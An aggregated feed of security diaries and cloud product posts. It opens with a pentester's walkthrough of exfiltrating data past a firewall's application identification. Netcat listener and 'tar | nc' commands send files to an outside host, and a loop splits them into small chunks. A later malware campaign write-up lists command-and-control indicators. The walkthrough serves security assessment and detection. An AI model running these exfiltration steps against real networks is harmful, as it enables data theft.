Application Control Bypass for Data Exfiltration, (Tue, Mar 31st)

This post was originally published on this site

In case of a cyber incident, most organizations fear more of data loss (via exfiltration) than regular data encryption because they have a good backup policy in place. If exfiltration happened, it means a total loss of control of the stolen data with all the consequences (PII, CC numbers, …).

While performing a security assessment of a corporate network, I discovered that a TCP port was open to the wild Internet, even if the audited company has a pretty strong firewall policy. The open port was discovered via a regular port scan. In such situation, you try to exploit this "hole" in the firewall. What I did, I tried to exfiltrate data through this port. It’s easy: Simulate a server controlled by a threat actor:

root@attacker:~# nc -l -p 12345 >/tmp/victim.tgz

And, from a server on the victim’s network:

root@victim:~# tar czvf - /juicy/data/to/exfiltrate | nc wild.server.com 12345

It worked but the data transfer failed after approximatively ~5KB of data sent… weird! Every time, the same situation. I talked to a local Network Administrator who said that they have a Palo Alto Networks firewall in place with App-ID enabled on this port.

Note: What I am explaining here is not directly related to this brand of firewall. The same issue may apply with any “next-generation” firewall! For example, Checkpoint firewalls use the App Control blade and Fortinet firewalls use “Application Control”.

App-ID in Palo Alto Networks firewalls is the component performing traffic classification on the protected network(s), regardless of port, protocol, or encryption. Instead of relying on traditional port-based rules (e.g., TCP/80 == HTTP), App-ID analyzes traffic in real time to determine the actual application (e.g., Facebook, Dropbox, custom apps), enabling more granular and accurate security policies. This allows administrators to permit, deny, or control applications directly, apply user-based rules, and enforce security profiles (IPS, URL filtering, etc.) based on the true nature of the traffic rather than superficial indicators like ports. This also prevent well-known protocols to be used on exotic ports (ex: SSH over 12222).

The main issue with this technique is that enough packets must be sent over the wire to perform a good classification. So, the traffic is always allowed first and, if something bad is detected, remaining packets are blocked.

In terms of data volume, there’s no strict fixed threshold, but in practice App-ID usually needs at least the first few KB of application payload to reach a reliable classification. Roughly speaking:

  • <1 KB (or just handshake packets): almost always insufficient → likely unknown or very generic classification
  • ~1–5 KB: basic identification possible for simple or clear-text protocols (HTTP, DNS, some TLS SNI-based detection)
  • ~5–10+ KB: much higher confidence, especially for encrypted or complex applications

That’s why my attempts to exfiltrate data were all blocked after ~5KB.

Can we bypass this? Let’s try the following scenario:

On the external host (managed by me,  the "Threat Actor"), let’s execute a netcat in an infinite loop with a small timeout (because the firewall won’t drop the connection, just block packets:

i=0
while true; do
    filename=$(printf "/tmp/chunk_%04d.bin" "$i")
    nc -l -p 12345 -v -v -w 5 >$filename
    echo "Dumped $filename"
    ((i++))
done

On the victim’s computer, I (vibe-)coded a Python script that will perform the following tasks:
– Read a file
– Split it in chunks of 3KB
– Send everything to a TCP connection (with retries in case of failure of couse)

The code is available on Pastebin[1]. Example:

root@victim:~# sha256sum data.zip
955587e24628dc46c85a7635cae888832113e86e6870cba0312591c44acf9833  data.zip
root@victim:~# python3 send_file.py data.zip wild.server.com 12345
File: 'data.zip' ((359370 bytes) -> 117ll chunk(s) of up to 3072 bytes.
Destination: wild.server.com:12345  (timeout=5s, max_retries=10)

  Chunk 1/1177 sent successfully (attempt 1).
  Chunk 2/1177 sent successfully (attempt 1).
  Chunk 3/1177 sent successfully (attempt 1).
  Chunk 4/1177 sent successfully (attempt 1).
  Chunk 5/1177 sent successfully (attempt 1).
  Chunk 6/1177 sent successfully (attempt 1).
  Chunk 7/1177 sent successfully (attempt 1).
  Chunk 8/1177 sent successfully (attempt 1).
  Chunk 9/1177 sent successfully (attempt 1).
  Chunk 10/1177 sent successfully (attempt 1).
  Chunk 11/1177 sent successfully (attempt 1).
  Chunk 12/1177 sent successfully (attempt 1).
  [...]

And on the remote side, chunks are created, you just need to rebuild the original file:

root@attacker:~# cat /tmp/chunk_0* >victim.zip
root@attacker:~# sha256sum victim.zip
955587e24628dc46c85a7635cae888832113e86e6870cba0312591c44acf9833  victim.zip

The file has been successfully exfiltrated! (the SHA256 hashes are identical). Of course, it's slow but it does not generate peaks of bandwidth that could reveal a huge amount of data being exfiltrated!

This technique worked for me with a file of a few megabytes. It is more a proof-of-concept because firewalls may implement more detection controls. For example, this technique is easy to detect due to the high number of small TCP connections that may look like malware beaconing. It could be also useful to encrypt your data because packets could be flagged by the IDS component of the firewall… 

[1] https://pastebin.com/Ct9ePEiN

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TeamPCP Supply Chain Campaign: Update 004 – Databricks Investigating Alleged Compromise, TeamPCP Runs Dual Ransomware Operations, and AstraZeneca Data Released, (Mon, Mar 30th)

This post was originally published on this site

This is the fourth update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 003 covered developments through March 28, including the first 48-hour pause in new compromises and the campaign's shift to monetization. This update consolidates intelligence from March 28-30, 2026 — two days since our last update.

DShield (Cowrie) Honeypot Stats and When Sessions Disconnect, (Mon, Mar 30th)

This post was originally published on this site

A lot of the information seen on DShield honeypots [1] is repeated bot traffic, especially when looking at the Cowrie [2] telnet and SSH sessions. However, how long a session lasts, how many commands are run per session and what the last commands run before a session disconnects can vary. Some of this information could help indicate whether a session is automated and if a honeypot was fingerprinted. This information can also be used to find more interesting honeypot sessions.

TeamPCP Supply Chain Campaign: Update 003 – Operational Tempo Shift as Campaign Enters Monetization Phase With No New Compromises in 48 Hours, (Sat, Mar 28th)

This post was originally published on this site

This is the third update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 002 covered developments through March 27, including the Telnyx PyPI compromise and Vect ransomware partnership. This update covers developments from March 27-28, 2026.

TeamPCP Supply Chain Campaign: Update 002 – Telnyx PyPI Compromise, Vect Ransomware Mass Affiliate Program, and First Named Victim Claim, (Fri, Mar 27th)

This post was originally published on this site

This is the second update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 001 covered developments through March 26. This update covers developments from March 26-27, 2026.

Customize your AWS Management Console experience with visual settings including account color, region and service visibility

This post was originally published on this site

In August 2025, we introduced AWS User Experience Customization (UXC) capability to tailor user interfaces (UIs) to meet your specific needs and complete your tasks efficiently. With this capability, your account administrator can customize some UI component of AWS Management Console, such as assigning a color to an AWS account for easier identification.

Today, we’re announcing additional customization capability in UXC that enables selective display of relevant AWS Regions and services for your team members. By hiding unused Regions and services, you can reduce cognitive load and eliminate unnecessary clicks and scrolling, helping you focus better and work faster. With this launch, we offer the ability to customize account color, Region, and service visibility together.

Categorize account by color
You can set a color for your accounts to visually distinguish between them. To get started, sign in to the AWS Management Console and choose your account name on the navigation bar. Your account color isn’t set yet. To set the color, choose Account.

In the Account display settings, select your preferred account color and choose Update. You can see the chosen color in the navigation bar.

By changing the account color, you can clearly distinguish the account’s purpose. For example, you can use orange for development accounts, light blue for test accounts, and red for production accounts.

Customize Regions and services visibility
You can control which AWS Regions appear in the Region selector or which AWS services appear in the console navigation. In other words, you can set to show only the Regions and services that are relevant to your account.

To get started, choose the gear icon on the navigation bar and choose See all user settings. If you are in an administrator role, you can see a new Account settings tab in the unified settings. If you have not configured a setting, all Regions and services are visible.

To set visible Regions, choose Edit in the Visible Regions section. Select your visible Regions to All available Regions or Select Regions and configure your list. Choose Save changes.

After configuring visible Region setting, you will find only selected Regions in the Regions selector on the navigation bar in the console.

You can also set visible services in the same way. Search or select services from the category. I used the Popular services category to select my favorites. When you finish selection, choose Save changes.

After configuring visible services setting, you will find only selected services in the All services menu on the navigation bar.

When you search the service name in the search bar, you can only choose selected services.

The Regions and services visibility settings control only the appearance of services and Regions in the console. They don’t restrict access through the AWS Command Line Interface (AWS CLI), AWS SDKs, AWS APIs, or Amazon Q Developer.

You can also manage these account customization settings programmatically with new visibleServices and visibleRegions parameters. For example, you can use AWS CloudFormation sample template:

AWSTemplateFormatVersion: "2010-09-09"
Description: Customize AWS Console appearance for this account

Resources:
  AccountCustomization:
    Type: AWS::UXC::AccountCustomization
    Properties:
      AccountColor: red
      VisibleServices:
        - s3
        - ec2
        - lambda
      VisibleRegions:
        - us-east-1
        - us-west-2

And you can deploy your Cloudformation template.

$ aws cloudformation deploy 
  --template-file account-customization.yaml 
  --stack-name my-account-customization

To learn more, visit the AWS User Experience Customization API Reference and AWS CloudFormation template reference.

Give it a try in the AWS Management Console today and provide feedback by selecting the Feedback link at the bottom of the console, posting to the AWS re:Post forum for the AWS Management Console, or reaching out to your AWS Support contacts.

Channy

TeamPCP Supply Chain Campaign: Update 001 ? Checkmarx Scope Wider Than Reported, CISA KEV Entry, and Detection Tools Available, (Thu, Mar 26th)

This post was originally published on this site

This is the first update to the TeamPCP supply chain campaign threat intelligence report, “When the Security Scanner Became the Weapon” (v3.0, March 25, 2026). That report covers the full campaign from the February 28 initial access through the March 24 LiteLLM PyPI compromise. This update covers developments since publication.

Apple Patches (almost) everything again. March 2026 edition., (Wed, Mar 25th)

This post was originally published on this site

Apple released the next version of its operating system, patching 85 different vulnerabilities across all of them. None of the vulnerabilities are currently being exploited. The last three macOS "generations" are covered, as are the last two versions of iOS/iPadOS. For tvOS, watchOS, and visionOS, only the current version received patches. This update also includes the recently released Background Security Improvements. Some older watchOS versions received updates, but these updates do not address any security issues.

Announcing Amazon Aurora PostgreSQL serverless database creation in seconds

This post was originally published on this site

At re:Invent 2025, Colin Lazier, vice president of databases at AWS, emphasized the importance of building at the speed of an idea—enabling rapid progress from concept to running application. Customers can already create production-ready Amazon DynamoDB tables and Amazon Aurora DSQL databases in seconds. He previewed creating an Amazon Aurora serverless database with the same speed, and customers have since requested quick access and speed to this capability.

Today, we’re announcing the general availability of a new express configuration for Amazon Aurora PostgreSQL, a streamlined database creation experience with preconfigured defaults designed to help you get started in seconds.

With only two clicks, you can have an Aurora PostgreSQL serverless database ready to use in seconds. You have the flexibility to modify certain settings during and after database creation in the new configuration. For example, you can change the capacity range for the serverless instance at the time of create or add read replicas, modify parameter groups after the database is created. Aurora clusters with express configuration are created without an Amazon Virtual Private Cloud (Amazon VPC) network and include an internet access gateway for secure connections from your favorite development tools – no VPN, or AWS Direct Connect required. Express configuration also sets up AWS Identity and Access Management (IAM) authentication for your administrator user by default, enabling passwordless database authentication from the beginning without additional configuration.

After it’s created, you have access to features available for Aurora PostgreSQL serverless, such as deploying additional read replicas for high availability and automated failover capabilities. This launch also introduces a new internet access gateway routing layer for Aurora. Your new serverless instance comes enabled by default with this feature, which allows your applications to connect securely from anywhere in the world through the internet using the PostgreSQL wire protocol from a wide range of developer tools. This gateway is distributed across multiple Availability Zones, offering the same level of high availability as your Aurora cluster.

Creating and connecting to Aurora in seconds means fundamentally rethinking how you get started. We launched multiple capabilities that work together to help you onboard and run your application with Aurora. Aurora is now available on AWS Free Tier, which you gain hands-on experience with Aurora at no upfront cost. After it’s created, you can directly query an Aurora database in AWS CloudShell or using programming languages and developer tools through a new internet accessible routing component for Aurora. With integrations such as v0 by Vercel, you can use natural language to start building your application with the features and benefits of Aurora.

Create an Aurora PostgreSQL serverless database in seconds
To get started, go to the Aurora and RDS console and in the navigation pane, choose Dashboard. Then, choose Create with a rocket icon.

Review pre-configured settings in the Create with express configuration dialog box. You can modify the DB cluster identifier or the capacity range as needed. Choose Create database.

You can also use the AWS Command Line Interface (AWS CLI) or AWS SDKs with the parameter --express-configuration to create both a cluster and an instance within the cluster with a single API call which makes it ready for running queries in seconds.To learn more, visit Creating an Aurora PostgreSQL DB cluster with express configuration.

Here is a CLI command to create the cluster:

$ aws rds create-db-cluster --db-cluster-identifier channy-express-db 
    --engine aurora-postgresql 
    –with-express-configuration

Your Aurora PostgreSQL serverless database should be ready in seconds. A success banner confirms the creation, and the database status changes to Available.

After your database is ready, go to the Connectivity & security tab to access three connection options. When connecting through SDKs, APIs, or third-party tools including agents, choose Code snippets. You can choose various programming languages such as .NET, Golang, JDBC, Node.js, PHP, PSQL, Python, and TypeScript. You can paste the code from each step into your tool and run the commands.

For example, the following Python code is dynamically generated to reflect the authentication configuration:

import psycopg2
import boto3

auth_token = boto3.client('rds', region_name='ap-south-1').generate_db_auth_token(DBHostname='channy-express-db-instance-1.abcdef.ap-south-1.rds.amazonaws.com', Port=5432, DBUsername='postgres', Region='ap-south-1')

conn = None
try:
    conn = psycopg2.connect(
        host='channy-express-db-instance-1.abcdef.ap-south-1.rds.amazonaws.com',
        port=5432,
        database='postgres',
        user='postgres',
        password=auth_token,
        sslmode='require'
    )
    cur = conn.cursor()
    cur.execute('SELECT version();')
    print(cur.fetchone()[0])
    cur.close()
except Exception as e:
    print(f"Database error: {e}")
    raise
finally:
    if conn:
        conn.close()

const { Client } = require('pg');
const AWS = require('aws-sdk');
AWS.config.update({ region: 'ap-south-1' });

async function main() {
  let password = '';
  const signer = new AWS.RDS.Signer({ region: 'ap-south-1', hostname: 'channy-express-db-instance-1.abcdef.ap-south-1.rds.amazonaws.com', port: 5432, username: 'postgres' });
  password = signer.getAuthToken({});

  const client = new Client({
    host: 'channy-express-db-instance-1.abcdef.ap-south-1.rds.amazonaws.com',
    port: 5432,
    database: 'postgres',
    user: 'postgres',
    password,
    ssl: { rejectUnauthorized: false }
  });

  try {
    await client.connect();
    const res = await client.query('SELECT version()');
    console.log(res.rows[0].version);
  } catch (error) {
    console.error('Database error:', error);
    throw error;
  } finally {
    await client.end();
  }
}
main().catch(console.error);

Choose CloudShell for quick access to the AWS CLI which launches directly from the console. When you choose Launch CloudShell, you can see the command is pre-populated with relevant information to connect to your specific cluster. After connecting to the shell, you should see the psql login and the postgres => prompt to run SQL commands.

You can also choose Endpoints to use tools that only support username and password credentials, such as pgAdmin. When you choose Get token, you use an AWS Identity and Access Management (IAM) authentication token generated by the utility in the password field. The token is generated for the master username that you set up at the time of creating the database. The token is valid for 15 minutes at a time. If the tool you’re using terminates the connection, you will need to generate the token again.

Building your application faster with Aurora databases
At re:Invent 2025, we announced enhancements to the AWS Free Tier program, offering up to $200 in AWS credits that can be used across AWS services. You’ll receive $100 in AWS credits upon sign-up and can earn an additional $100 in credits by using services such as Amazon Relational Database Service (Amazon RDS), AWS Lambda, and Amazon Bedrock. In addition, Amazon Aurora is now available across a broad set of eligible Free Tier database services.

Developers are embracing platforms such as Vercel, where natural language is all it takes to build production-ready applications. We announced integrations with Vercel Marketplace to create and connect to an AWS database directly from Vercel in seconds and v0 by Vercel, an AI-powered tool that transforms your ideas into production-ready, full-stack web applications in minutes. It includes Aurora PostgreSQL, Aurora DSQL, and DynamoDB databases. You can also connect your existing databases created through express configuration with Vercel. To learn more, visit AWS for Vercel.

Like Vercel, we’re bringing our databases seamlessly into their experiences and are integrating directly with widely adopted frameworks, AI assistant coding tools, environments, and developer tools, all to unlock your ability to build at the speed of an idea.

We introduced Aurora PostgreSQL integration with Kiro powers, which developers can use to build Aurora PostgreSQL backed applications faster with AI agent-assisted development through Kiro. You can use Kiro power for Aurora PostgreSQL within Kiro IDE and from the Kiro powers webpage for one-click installation. To learn more about this Kiro Power, read Introducing Amazon Aurora powers for Kiro and Amazon Aurora Postgres MCP Server.

Now available
You can create an Aurora PostgreSQL serverless database in seconds today in all AWS commercial Regions. For Regional availability and a future roadmap, visit the AWS Capabilities by Region.

You pay only for capacity consumed based on Aurora Capacity Units (ACUs) billed per second from zero capacity, which automatically starts up, shuts down, and scales capacity up or down based on your application’s needs. To learn more, visit the Amazon Aurora Pricing page.

Give it a try in the Aurora and RDS console and send feedback to AWS re:Post for Aurora PostgreSQL or through your usual AWS Support contacts.

Channy

SmartApeSG campaign pushes Remcos RAT, NetSupport RAT, StealC, and Sectop RAT (ArechClient2), (Wed, Mar 25th)

This post was originally published on this site

Introduction

This diary provides indicators from the SmartApeSG (ZPHP, HANEYMANEY) campaign I saw on Tuesday, 2026-03-24. SmartApeSG is one of many campaigns that use the ClickFix technique. This past week, I've seen NetSupport RAT as follow-up malware from Remcos RAT pushed by this campaign. But this time, I also saw indicators for StealC malware and Sectop RAT (ArecheClient2) after NetSupport RAT appeared on my infected lab host.

Not all of the follow-up malware appears shortly after the initial Remcos RAT malware. Here's the timeline for malware from my SmartApeSG activity on Tuesday 2026-03-24:

  • 17:11 UTC – Ran ClickFix script from SmartApeSG fake CAPTCHA page
  • 17:12 UTC – Remcos RAT post-infection traffic starts
  • 17:16 UTC – NetSupport RAT post-infection traffic starts
  • 18:18 UTC – StealC post-infection traffic starts
  • 19:36 UTC – Sectop RAT post-infection traffic starts

While the NetSupport RAT activity happened approximately 4 minutes after the Remcos RAT activity, the StealC traffic didn't happen until approximately 1 hour after the NetSupport RAT activity started. And the traffic for Sectop RAT happened approximately 1 hour and 18 minutes after the StealC activity started.

Images from the infection


Shown above: Page from a legitimate but compromised website with injected script for the fake CAPTCHA page.


Shown above: Fake CAPTCHA page with ClickFix instructions. This image shows the malicious script injected into a user's clipboard.


Shown above: Traffic from the infection filtered in Wireshark.

Indicators of Compromise

Associated domains and IP addresses:

  • fresicrto[.]top – Domain for server hosting fake CAPTCHA page
  • urotypos[.]com – Called by ClickFix instructions, this domain is for a server hosting the initial malware
  • 95.142.45[.]231:443 – Remcos RAT C2 server
  • 185.163.47[.]220:443 – NetSupport RAT C2 server
  • 89.46.38[.]100:80 – StealC C2 server
  • 195.85.115[.]11:9000 – Sectop RAT (ArechClient2) C2 server

Example of HTA file retrieved by ClickFix script:

  • SHA256 hash: 212d8007a7ce374d38949cf54d80133bd69338131670282008940f1995d7a720
  • File size: 47,714 bytes
  • File type: HTML document text, ASCII text, with very long lines (6272)
  • Retrieved from: hxxps[:]//urotypos[.]com/cd/temp
  • Saved location: C:Users[username]AppDataLocalpost.hta
  • Note: ClickFix script deletes the file after retrieving and running it

Example of ZIP archive for Remcos RAT retrieved by the above HTA file:

ZIP archive containing NetSupport RAT package:

RAR archive for StealC package:

RAR archive for Sectop RAT (ArechClient2) package:

Final words

The archive files for Remcos RAT, StealC and Sectop RAT are packages that use legitimate EXE files to side-load malicious DLLs (a technique called DLL side-loading). The NetSupport RAT package is a legitimate tool that's configured to use an attacker-controlled server.

As always, the files, URLs and domains for SmartApeSG activity change on a near-daily basis. And names of the HTA file and ZIP archive for Remcos RAT are different for each infection. The indicators described in this article may no longer be current as you read this. However, this activity confirms that the SmartApeSG campaign can push a variety of malware after an initial infection.


Bradley Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.